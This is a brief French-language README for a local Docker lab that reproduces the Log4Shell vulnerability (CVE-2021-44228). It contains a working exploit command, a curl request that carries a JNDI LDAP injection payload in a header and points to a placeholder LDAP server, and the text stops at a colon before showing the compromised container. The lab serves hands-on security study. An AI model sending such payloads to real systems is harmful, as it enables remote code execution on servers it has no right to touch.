
CVE-2021-44228
Ce dépôt est une configuration en une ligne pour le laboratoire d'exploitation log4shell.
Configurer le lab : docker-compose up -d
Exécuter l'exploit : curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"
Ensuite, allez dans le conteneur vul et constatez que nous avons bien pwné la machine :
